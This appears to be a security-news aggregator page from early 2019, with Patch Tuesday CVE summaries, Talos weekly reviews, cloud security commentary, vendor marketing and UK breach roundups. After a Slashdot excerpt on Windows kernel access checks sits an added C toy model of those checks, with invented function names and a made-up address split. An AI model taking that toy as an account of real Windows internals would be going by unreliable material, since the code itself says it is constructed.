The Object Manager then calls back into the I/O Manager, directing the file-open request to the specific driver that can handle it. Throughout this, the indication of the original source of the request -- kernel or user mode -- is preserved and passed around. If the call comes from user mode, each component should perform strict validation of parameters and a full access check; if it comes from kernel mode, these should be skipped. Unfortunately, this basic rule isn't enough to handle every situation. For various reasons, Windows allows exceptions to the basic user-mode/kernel-mode split. Both kinds of exceptions are allowed: kernel code can force drivers to perform a permissions check even if the attempt to open the file originated from kernel mode, and contrarily, kernel code can tell drivers to skip the parameter check even if the attempt to open the file appeared to originate from user mode. This behavior is controlled through additional parameters passed among the various kernel functions and into filesystem drivers: there's the basic user-or-kernel mode parameter, along with a flag to force the permissions check and another flag to skip the parameter validation...

Read more of this story at Slashdot.
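The excerpt above describes a rule that is easy to state and hard to keep consistent across layers: the originating mode decides whether an open gets parameter validation and an ACL check, and two override flags let kernel code force the check or skip the validation. The toy model below is an added example written for this page; it is not Windows kernel code and none of the names (OpenContext, io_open_file, object_manager_open, fs_driver_open, reissue_from_kernel, KERNEL_BASE) are real NT APIs. It carries the context unchanged through three stand-in layers and shows the one invariant a defender cares about: when kernel code re-issues a request on behalf of an earlier user-mode caller, the force-access-check flag must be set so the original security semantics survive.

```c
/* Added example, not from the Ars Technica report or from Windows source.
 * All names and the address split are hypothetical. */
#include <stdbool.h>
#include <stdio.h>

typedef enum { KERNEL_MODE = 0, USER_MODE = 1 } RequestorMode;

/* The per-request context the text describes: the originating mode plus
 * the two override flags. Every layer forwards it untouched. */
typedef struct {
    RequestorMode mode;      /* where the open originated */
    bool force_access_check; /* kernel asks for the ACL check even in kernel mode */
    bool skip_validation;    /* kernel asks to skip address checks for a user-mode open */
} OpenContext;

typedef struct { unsigned owner_uid; unsigned reader_gid; } Acl;   /* toy ACL */
typedef struct { unsigned uid; unsigned gid; } Caller;             /* toy token */

typedef enum { OPEN_OK = 0, OPEN_ACCESS_DENIED = 1, OPEN_BAD_ADDRESS = 2 } OpenResult;

/* Constructed address split: addresses at or above this are "kernel memory". */
#define KERNEL_BASE 0x80000000u

static bool needs_access_check(const OpenContext *c) {
    return c->mode == USER_MODE || c->force_access_check;
}

static bool needs_param_validation(const OpenContext *c) {
    return c->mode == USER_MODE && !c->skip_validation;
}

static bool acl_permits(const Acl *acl, const Caller *who) {
    return who->uid == acl->owner_uid || who->gid == acl->reader_gid;
}

/* Innermost layer (stand-in for a filesystem driver): applies the rule
 * using only the context it was handed. */
OpenResult fs_driver_open(const OpenContext *ctx, const Acl *acl,
                          const Caller *who, unsigned out_buffer) {
    if (needs_param_validation(ctx) && out_buffer >= KERNEL_BASE)
        return OPEN_BAD_ADDRESS;      /* user-mode caller supplied a kernel address */
    if (needs_access_check(ctx) && !acl_permits(acl, who))
        return OPEN_ACCESS_DENIED;    /* ACL check performed and failed */
    return OPEN_OK;
}

/* Middle layer (stand-in for the Object Manager): resolves the name and
 * forwards the same context; it must not re-derive the mode. */
OpenResult object_manager_open(const OpenContext *ctx, const Acl *acl,
                               const Caller *who, unsigned out_buffer) {
    return fs_driver_open(ctx, acl, who, out_buffer);
}

/* Entry layer (stand-in for the I/O Manager): records the originating mode
 * and the override flags once, at the boundary. */
OpenResult io_open_file(RequestorMode caller_mode, bool force_access_check,
                        bool skip_validation, const Acl *acl,
                        const Caller *who, unsigned out_buffer) {
    OpenContext ctx = { caller_mode, force_access_check, skip_validation };
    return object_manager_open(&ctx, acl, who, out_buffer);
}

/* When kernel code re-issues an open on behalf of an earlier request, the new
 * context is kernel-mode, so the ACL check would be skipped by default.
 * Preserving the original semantics means forcing the check whenever the
 * original request needed one. */
OpenContext reissue_from_kernel(const OpenContext *original) {
    OpenContext ctx = { KERNEL_MODE, needs_access_check(original),
                        original->skip_validation };
    return ctx;
}

int main(void) {
    Acl secret = { 0, 100 };              /* owned by uid 0, readable by gid 100 */
    Caller ordinary = { 1000, 1000 };     /* neither owner nor in the reader group */
    OpenContext from_user = { USER_MODE, false, false };
    OpenContext reissued = reissue_from_kernel(&from_user);

    printf("user-mode open of secret: %d\n",
           io_open_file(USER_MODE, false, false, &secret, &ordinary, 0x1000u));
    printf("kernel-mode open of secret: %d\n",
           io_open_file(KERNEL_MODE, false, false, &secret, &ordinary, 0x1000u));
    printf("re-issued open keeps the check: %d\n",
           fs_driver_open(&reissued, &secret, &ordinary, 0x1000u));
    return 0;
}
```

The interesting case is the last one: the re-issued context reports KERNEL_MODE, so a layer that looked only at the mode would skip the ACL check; the forced flag is what keeps the ordinary caller from opening the protected object. Any layer that rebuilds the context from scratch instead of forwarding it is where this class of bug lives.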

Juniper Networks broadens commitment to open programmability with support of SONiC

Juniper Networks, an industry leader in automated, scalable and secure networks, announced native integration of Juniper’s platforms with Software for Open Networking in the Cloud (SONiC), which was developed and contributed to the Open Compute Project (OCP) Foundation by Microsoft. This integration will give cloud providers a simplified and automated switch management platform, enhanced by the rich routing and deep telemetry innovations valued by customers. Introduced by Microsoft in 2016, SONiC is a breakthrough for … More

The post Juniper Networks broadens commitment to open programmability with support of SONiC appeared first on Help Net Security.

Cyber Security Week in Review (March 15)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • The U.S. warned Germany that using Huawei’s 5G technology could result in a drop in information-sharing. American officials have consistently criticized the use of the Chinese company’s technology, saying they pose a national security risk. If other countries were to use Huawei’s 5G network, the U.S. says it would fear its intelligence was not being kept safe. 
  • It is reported that a hacking group stole an estimated six terabytes of data from the Citrix enterprise network. The company said it took steps to contain this data breach after it was alerted by the FBI, but thousands of customers’ information could still be at risk. It is not yet known what the nature of the information taken was.
  • Adobe fixed multiple remote code execution vulnerabilities in Photoshop and Digital Editions. The company released its monthly security update earlier this week. Two of the vulnerabilities were classified as critical, as an attacker could exploit them to execute code under the context of the current user.

From Talos


  • A new point-of-sale malware known as “GlitchPOS” has popped up on some online marketplaces. The malware is easy enough to install and use that virtually any user could buy their way into setting up their own botnet. We believe with high confidence that this is not the first malware created by this actor.
  • Microsoft released its monthly security update earlier this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 64 vulnerabilities, 17 of which are rated “critical,” 45 that are considered “important” and one “moderate” and “low” vulnerability each. This release also includes two critical advisories — one covering security updates to Adobe Flash Player and another concerning SHA-2.
  • CleanMyMac X contains a privilege escalation vulnerability in its helper service due to improper updating. The application fails to remove the vulnerable components upon upgrading to the latest version, leaving the user open to attack. CleanMyMac X is an all-in-one cleaning tool for Macs from MacPaw.

The rest of the news


  • Video app TikTok paid a $5.7 million fine to the Federal Trade Commission this week as part of a settlement. The FTC ruled that the app, which allows users to upload short videos of themselves performing songs, improperly handled the data of users who are under the age of 13.
  • Two U.S. Senators introduced a new bill that would overhaul the country’s child privacy laws. The new bill would give parents complete control over their children's data online, and even allow them to completely erase information from certain websites. It would also ban targeted ads toward anyone under the age of 13.
  • Security researchers discovered a critical flaw in Switzerland’s new voting system that would allow attackers to manipulate votes. The group is now urging the Swiss government to halt the rollout of the online system.
  • Social media hackers are stepping up their activity as Brexit votes continue in the U.K. Researchers discovered an uptick in fake accounts that are spreading pro-Brexit sentiment over the past several weeks.
  • The U.S.’s Office of the Inspector General says NASA’s information security program contains several critical vulnerabilities. A new report states that the space agency could be open to an attack from a nation-state actor.


Microsoft March Patch Tuesday Addressed Multiple Flaws And Two Zero-Day Bugs

The scheduled Microsoft March Patch Tuesday update bundle has rolled out. This update bundle also addresses numerous security flaws. In addition,

Microsoft March Patch Tuesday Addressed Multiple Flaws And Two Zero-Day Bugs on Latest Hacking News.

What you need to know for Patch Tuesday, March 2019

By SophosLabs Offensive Security Research Microsoft released their monthly security updates for March this past Tuesday. This month’s fixes address 64 vulnerabilities that affect Windows and a range of software that runs on Windows, mainly the Internet Explorer and Edge browsers. In addition, there was a patch released for one critical vulnerability in Adobe Flash. […]

Microsoft Releases Patches for 64 Flaws — Two Under Active Attack

It's time for another batch of "Patch Tuesday" updates from Microsoft. Microsoft today released its March 2019 software updates to address a total of 64 CVE-listed security vulnerabilities in its Windows operating systems and other products, 17 of which are rated critical, 45 important, one moderate and one low in severity. The update addresses flaws in Windows, Internet Explorer, Edge, MS

VERT Threat Alert: March 2019 Patch Tuesday Analysis

Today’s VERT Alert addresses Microsoft’s March 2019 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-821 on Wednesday, March 13th.  In-The-Wild & Disclosed CVEs CVE-2019-0754 This CVE describes a Denial of Service vulnerability that could cause a target system to stop responding when code is executed on the […]… Read More

The post VERT Threat Alert: March 2019 Patch Tuesday Analysis appeared first on The State of Security.

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week; the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond'. Here is a recap of the points I made.

Cloud is the 'Default Model' for Business

Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes that successful businesses continually crave. Indeed, the economies-of-scale benefits are not just more cost-effective and more agile IT services, but also better cybersecurity (from the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business's cloud service migration, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given the board ultimately owns the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services. The marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure; after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into the design of new cloud services, into requirements determination and into the procurement process. In particular, the areas of security responsibility must be defined and documented with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)

For example, with a PaaS model the business is fully responsible for deploying applications onto the cloud platform, and therefore for the security of those applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. An example of 'shared' responsibility in this model is the process of provisioning and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.


A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within the contract or a supporting agreement as service deliverables, then oversee those controls and processes through regular assessments.

Microsoft Patch Tuesday — March 2019: Vulnerability disclosures and Snort coverage


Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 64 vulnerabilities, 17 of which are rated “critical,” 45 that are considered “important” and one “moderate” and “low” vulnerability each. This release also includes two critical advisories — one covering security updates to Adobe Flash Player and another concerning SHA-2.

This month’s security update covers security issues in a variety of Microsoft’s products, including the VBScript scripting engine, Dynamic Host Configuration Protocol and the Chakra scripting engine. For coverage of these vulnerabilities, read the SNORTⓇ blog post here.

Critical vulnerabilities

Microsoft disclosed 17 critical vulnerabilities this month, all of which we will highlight below.

CVE-2019-0592 is a memory corruption vulnerability in the Chakra scripting engine that could allow an attacker to elevate their privileges. The bug lies in the way that the scripting engine handles objects in memory. In order to exploit this vulnerability, an attacker would need to trick a user into visiting a specially crafted, malicious web page in the Microsoft Edge web browser.

CVE-2019-0763 is a remote code execution vulnerability that exists when the Internet Explorer web browser improperly handles objects in memory. An attacker could exploit this vulnerability by tricking a user into visiting a malicious web page while using Internet Explorer.

CVE-2019-0756 is a remote code execution vulnerability in the Microsoft XML Core Services MSXML parser. An attacker can exploit this bug by tricking the user into opening a specially crafted website designed to invoke MSXML through a web browser. Eventually, the attacker would gain the ability to execute malicious code and take control of the user’s system.

CVE-2019-0609, CVE-2019-0639, CVE-2019-0680, CVE-2019-0769, CVE-2019-0770, CVE-2019-0771 and CVE-2019-0773 are all memory corruption vulnerabilities in Microsoft’s scripting engine that exist due to the way Microsoft Edge handles objects in memory. An attacker could exploit these bugs to corrupt memory in a way that would allow them to execute arbitrary code in the context of the current user. A user would trigger this vulnerability if they visited a specially crafted, malicious web page in Edge.

CVE-2019-0784 is a remote code execution vulnerability that exists due to the way ActiveX Data Objects (ADO) handle objects in memory. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page in Internet Explorer. Alternatively, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2019-0603 is a remote code execution vulnerability in Windows Deployment Services TFTP Server. The bug lies in the way the server handles objects in memory. If an attacker were to exploit this vulnerability, they’d gain the ability to execute arbitrary code with elevated permissions on a target system.

CVE-2019-0697, CVE-2019-0698 and CVE-2019-0726 are remote code execution vulnerabilities in the Windows DHCP client. The vulnerability triggers when the client receives specially crafted DHCP responses to a client, potentially allowing an attacker to execute arbitrary code on the target machine.

CVE-2019-0666 and CVE-2019-0667 are vulnerabilities in the VBScript engine that exist due to the way the engine handles objects in memory. An attacker could use these bugs to corrupt memory in a way that would allow them to execute arbitrary code in the context of the current user. A user could trigger these vulnerabilities by visiting an attacker-created website through Internet Explorer. An attacker could also provide them with an embedded ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

Important vulnerabilities

This release also contains 45 important vulnerabilities:

Moderate

There was one moderate vulnerability in this release: CVE-2019-0816, a security feature bypass vulnerability in Azure SSH Keypairs.

Low

The only low vulnerability in this release is CVE-2019-0777, a cross-site scripting vulnerability in Team Foundation.

Coverage 

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 45142, 45143, 46554, 46555, 48051, 48052, 49172, 49173, 49364 - 49369, 49371, 49372, 49378 - 49395, 49400 - 49403

Unpatched Vulnerability in Microsoft Office

Researchers at the RSA Conference unveiled a zero-day flaw in Microsoft Office that, when exploited on a Java-enabled system, could lead to complete ownage of the endpoint. Microsoft Security Research has responded and said they won't be releasing a patch for it now, but might at a future date. Note the flaw is being actively exploited in the wild, not a theoretical situation. However, the researchers admit this is not an easy flaw to exploit and requires in-depth knowledge of the format. Details are in this ThreatPost article:

https://threatpost.com/zero-day-exploit-microsoft/142327/

Protecting against the next wave of advanced threats targeting Office 365 – Trend Micro Cloud App Security 2018 detection results and customer examples

Since the release of “Trend Micro Cloud App Security 2017 Report” about a year ago, threats using email as the delivery vector have grown significantly. Business Email Compromise (BEC) scams have already caused USD $12.5 billion in global losses as of 2018, a 136.4% increase from the $5.3 billion reported in 2017. The popularity of Office 365 has made it an attractive target for cybercriminals.

In January 2019, the U.S. Secret Service issued a bulletin calling out phishing attacks that specifically target organizations using Office 365.

Trend Micro™ Cloud App Security™ is an API-based service protecting Microsoft® Office 365™ Exchange™ Online, OneDrive® for Business, and SharePoint® Online platforms. Using multiple advanced threat protection techniques, it acts as a second layer of protection after emails and files have passed through Office 365 scanning.

In 2018, Cloud App Security caught 8.9 million high-risk email threats missed by Office 365 security. Those threats include one million pieces of malware, 7.7 million phishing attempts and 103,955 BEC attempts. Each blocked threat represents a potential attack that could result in monetary and productivity losses. For example, the average cost per BEC incident is now USD $159,000, so blocking 103,000 BEC attacks means potentially saving our customers $16 billion!

No matter which Office 365 plan is in use, and whether or not a third-party email gateway is deployed, customers still stop a significant number of potentially damaging threats with Trend Micro Cloud App Security.

Customer examples: Additional detections after Office 365 built-in security (2018 data)

Customers relying on Office 365 built-in security saw obvious value from deploying Trend Micro Cloud App Security. For example, an internet company with 10,000 Office 365 E3 users found an additional 16,000 malware, 232,000 malicious URLs, 174,000 phishing emails and 2,000 BEC attacks in 2018.

Customer examples: Additional Detections after Office 365 Advanced Threat Protection (2018 data)

Customers using Office 365 Advanced Threat Protection (ATP) also need an additional layer of filtering. A logistics company with 80,000 users of E3 and ATP detected an additional 28,000 malware and 662,000 malicious URLs in 2018 with Trend Micro Cloud App Security.

Customer examples: Additional Detections after third-party email gateway and Office 365 built-in security (2018 data)

Many customers use a third-party email gateway to scan emails before they’re delivered to their Office 365 environment. Despite these gateway deployments, many of the sneakiest and hardest-to-detect threats still slipped through. Plus, a gateway solution can’t detect internal email threats, which can originate from compromised devices or accounts within Office 365.

For example, a business with 120,000 Office 365 users with a third-party email gateway stopped an additional 166,823 phishing emails, 237,222 malicious URLs, 78,246 known and unknown malware, and 1,645 BEC emails with Cloud App Security.

Innovative technologies to combat new email threats 

Continuous innovation is one key reason why Trend Micro is able to catch so many threats missed by Office 365 and/or third-party email gateways. In 2018, two new advanced features were introduced by Cloud App Security to help businesses stay protected from advanced email threats.

The first is Writing Style DNA, an artificial intelligence (AI)-powered technology that can help detect email impersonation tactics used in BEC scams. It uses AI to recognize a user’s writing style based on past emails and then compares it to suspected forgeries.

The second technology is a feature that combines AI and computer vision technology to help detect and block attempts at credential phishing in real time, especially now that more schemes use fake, legitimate-looking login webpages to deceive email users. A login page’s branded elements, login form, and other website components are checked by this tool to determine if a page is legitimate.

Additionally, Trend Micro uniquely offers a pre-execution machine learning engine to find unknown malware in addition to its award-winning Deep Discovery sandbox technology. The pre-execution machine learning engine provides better threat coverage while improving email delivery by finding threats before the sandbox layer.

Check out the Trend Micro Cloud App Security 2018 Report to get more details on the type of threats blocked by this product and common email attacks analyzed by Trend Micro Research in 2018.


Tripwire Patch Priority Index for February 2019

Tripwire’s February 2019 Patch Priority Index (PPI) brings together the top vulnerabilities from Microsoft and Adobe. First on the patch priority list this month are patches for Microsoft’s Browser and Scripting Engine. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Spoofing, Security Feature Bypass and Information Disclosure vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for February 2019 appeared first on The State of Security.

Cyber Security Roundup for February 2019

The perceived threat posed by Huawei to the UK national infrastructure continued to make the headlines throughout February, as politicians, UK government agencies and the Chinese telecoms giant continued to play out their rather public spat in the media. See my post Is Huawei a Threat to UK National Security? for further details, and also for why DDoS might be a greater threat to 5G than Huawei-supplied network devices.

February was a rather quiet month for hacks and data breaches in the UK; Mumsnet reported a minor data breach following a botched upgrade, and that was about it. The month was a busy one for security updates, with Microsoft, Adobe and Cisco all releasing high numbers of patches to fix various security vulnerabilities, including several released outside of their scheduled monthly patch release cycles.

A survey by PCI Pal concluded that the consequences of a data breach had a greater impact in the UK than in the United States, in that UK customers were more likely to abandon a company when let down by a data breach. The business reputational impact should always be taken into consideration when assessing security risk.


Another survey of interest was conducted by Nominet, who polled 408 Chief Information Security Officers (CISOs) at midsize and large organisations in the UK and the United States. A whopping 91% of the respondents admitted to experiencing high to moderate levels of stress, with 26% saying the stress had led to mental and physical health issues, and 17% saying they had turned to alcohol. The contributing factors for this stress were job security, inadequate budget and resources, and a lack of support from the board and senior management. A CISO role can certainly be a poisoned chalice, so it's really no surprise most CISOs don't stay put for long.

A Netscout Threat Landscape Report declared that in the second half of 2018, cyber attacks against IoT devices and DDoS attacks had both risen dramatically. Fuelled by the compromise of high numbers of IoT devices, the number of DDoS attacks in the 100GBps to 200GBps range increased 169%, while those in the 200GBps to 300GBps range exploded 2,500%. The report concluded cybercriminals had built and used cheaper, easier-to-deploy and more persistent malware, and cyber gangs had achieved this higher level of efficiency by adopting the same principles used by legitimate businesses. These improvements have helped malicious actors greatly increase the number of medium-size DDoS attacks while infiltrating IoT devices even more quickly.

In a rare speech, Jeremy Fleming, the head of GCHQ, warned the internet could deteriorate into "an even less governed space" if the international community doesn't come together to establish a common set of principles. He said "China, Iran, Russia and North Korea" had broken international law through cyber attacks, and made the case for when "offensive cyber activities" were good, saying "their use must always meet the three tests of legality, necessity and proportionality. Their use, in particular to cause disruption or damage - must be in extremis". Clearly international law wasn't developed with cyber space in mind, so it looks like GCHQ is attempting to raise awareness to remedy that.

I will be speaking at the e-crime Cyber Security Congress in London on 6th March 2019, on cloud security, new business metrics, future risks and priorities for 2019 and beyond.

Finally, completely out of the blue, I was informed by 4D that this blog had been picked by a team of their technical engineers and Directors as one of the best Cyber Security Blogs in the UK: The 6 Best Cyber Security Blogs - A Data Centre's Perspective. Truly humbled and in great company to be on that list.


    Cyber Security Week in Review (Feb. 15, 2019)


    Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

    Top headlines this week


    • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
    • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice of only routing the country’s web requests through the country and not internationally. The country will run a test later this year in an effort to test its cyber defenses.
    • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

    From Talos


    • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
    • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
    • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

    Malware roundup


    • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once infected, the malware can steal users’ personal information and uses several deobfuscation techniques to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
    • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask them to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to only be available to the National Credit Union Administration.
    • Google removed a cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials in order to drain users’ Ethereum funds.

    The rest of the news


    • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background of cameras to record hashes of the video; a hash recomputed later would differ if the video had been edited. All of these results are recorded on the public blockchain.
    • India requested Facebook give its government a backdoor into the WhatsApp messaging app. This would require Facebook to give the government access to users’ encrypted messages that were originally secret.
    • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  


    Microsoft Patch Tuesday — February 2019: Vulnerability disclosures and Snort coverage


    Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player.

    This month’s security update covers security issues in a variety of Microsoft’s products, including the Chakra Scripting Engine, Internet Explorer and Exchange. For coverage of these vulnerabilities, read the SNORTⓇ blog post here.

    Critical vulnerabilities

    Microsoft disclosed 20 critical vulnerabilities this month, 12 of which we will highlight below.

    CVE-2019-0590, CVE-2019-0591, CVE-2019-0593, CVE-2019-0640, CVE-2019-0642, CVE-2019-0644, CVE-2019-0651, CVE-2019-0652 and CVE-2019-0655 are all memory corruption vulnerabilities in the Microsoft scripting engine. The bugs all lie in the way the engine processes objects in memory in the Microsoft Edge web browser. An attacker could exploit this vulnerability to corrupt the machine’s memory, eventually allowing them to execute code remotely in the context of the current user. A user could trigger this bug by either visiting a malicious web page while using Edge, or by accessing specially crafted content created by the attacker.

    CVE-2019-0606 is a memory corruption vulnerability in Microsoft Internet Explorer. The problem lies in the way the web browser accesses objects in memory. An attacker could exploit this vulnerability by tricking a user into visiting a specially crafted website or user-created content in Internet Explorer. Once triggered, the attacker could gain the ability to execute code remotely in the context of the current user.

    CVE-2019-0645 and CVE-2019-0650 are memory corruption vulnerabilities that exist in Microsoft Edge when the web browser fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking a user into visiting a maliciously crafted website in Edge, or clicking on specially crafted content. An attacker could use this bug to gain the ability to execute arbitrary code in the context of the current user.

    These are the other critical vulnerabilities:


    Important vulnerabilities

    This release also contains 46 important vulnerabilities:

    Moderate

    There were also three moderate vulnerabilities in this release: CVE-2019-0641, CVE-2019-0643 and CVE-2019-0670.

    Coverage 

    In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

    Snort rules: 49128 - 49170

    Cyber Security Roundup for January 2019

    The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018.  On Saturday 26th January, car services and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disrupted its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the outbreak was more likely caused by a general lack of security patching and anti-virus protection than by anything sophisticated.

    B&Q said it had taken action after a security researcher found and disclosed details of B&Q's suspected store thieves online. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, which included:
    • the first and last names of individuals caught or suspected of stealing goods from stores
    • descriptions of the people involved, their vehicles and other incident-related information
    • the product codes of the goods involved
    • the value of the associated loss

    Hundreds of German politicians, including Chancellor Angela Merkel, had personal details stolen and published online at the start of January.  A 20-year-old suspect was later arrested in connection with this disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed using online resources, and had no training in computer science. Yet another example of the low entry level for individuals in becoming a successful and sinister hacker.

    Hackers took control of 65,000 Smart TVs around the world, in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encourages victims to visit a web address before finishing up with, "you should also subscribe to PewDiePie"
    Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

    The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame, but were said to have fixed them anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video of the negative impact of that stunt on the hackers on the BBC News website - The PewDiePie Hackers: Could hacking printers ruin your life?

    Security company ForeScout said it had found thousands of vulnerable devices using the search engines Shodan and Censys, many of which were located in hospitals and schools. Heating, ventilation, and air conditioning (HVAC) systems were among those that the team could have taken control of after it developed its own proof-of-concept malware.

    Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced a mass password revocation by Reddit in response. A Reddit admin said a "large group of accounts were locked down" due to "anomalous activity suggesting unauthorised access".

    Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

    Action Fraud issued a new warning about a convincing TV Licensing scam phishing email doing the rounds. The emails use subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open them. TV Licensing warned it never asks for this sort of information over email.

    January saw further political pressure and media coverage about the threat posed to UK national security by Chinese telecoms giant Huawei; I'll cover all that in a separate blog post.



    Microsoft Windows 7 & Windows 2008 End of Life

    Microsoft Windows 7 and Windows Server 2008 End of Life is fast approaching. 'End of Life' is the point where the operating system will be no longer supported with security patches, unless you (as a business) take out a rather expensive extended warranty agreement with Microsoft.



    As a home user, you should upgrade from Windows 7 without delay, as there are significant performance improvements to be gained with Windows 10. I always recommend installing Windows 10 from scratch onto a blank hard disk drive, rather than using the upgrade option. Ideally install onto a new Solid State Drive (SSD), which improves an operating system's performance massively. SSDs have come down in price in recent months, making a decent-capacity SSD an affordable option. Always ensure all your important documents and data are backed up, and double check the backup before attempting an operating system installation or upgrade.

    Where, as a business, you have Windows 7 and Windows Server 2008 present, it is imperative not to leave your upgrade plan until the last minute, as mass operating system upgrades within a business can be fraught with delays due to technical issues and unforeseen business circumstances. Also, Microsoft Windows Server 2016 has a significant virtualisation performance advantage over the 2008 and 2012 versions. And given the high security risk, or the cost of purchasing a Microsoft Extended Warranty, there really can be no solid business reason for delaying an upgrade project.

    Microsoft Product      End of Life Date
    Windows 7              14/01/2020
    Windows Server 2008    14/01/2020
    Office 2010            13/10/2020
    Windows Server 2012    10/01/2023
    Windows 8/8.1          10/01/2023
    Office 2013            11/04/2023
    Windows 10             14/10/2025
    Office 2016            14/10/2025

    For further Microsoft EOL details see https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet

    Cyber Security Roundup for December 2018

    The final Cyber Security Roundup of 2018 brings more reports of major data breaches, serious software vulnerabilities and evolving cyber threats, so pretty much like the previous 11 months of the year.

    5.3 million users of "make your own avatar" app Boomoji had their accounts compromised, after the company reportedly didn't secure its internet-connected databases properly. "Question and Answer" website Quora also announced the compromise of 100 million of its user accounts following a hack.


    A large data breach reported in Brazil is of interest: a massive 120 million Brazilian citizens' personal records were compromised due to a poorly secured Amazon S3 bucket. This is not the first mass data breach caused by an insecure S3 bucket we've seen in 2018. The lesson to be learnt in the UK is to never assume or take cloud security for granted; it's essential practice to test and audit cloud services regularly.

    Amongst the amazing and intriguing space exploration successes reported by NASA in December, the space agency announced its employees' personal data may have been compromised. Let's hope poor security doesn't jeopardise the great and highly expensive work NASA is undertaking.
    NASA InSight Lander arrives on Mars 
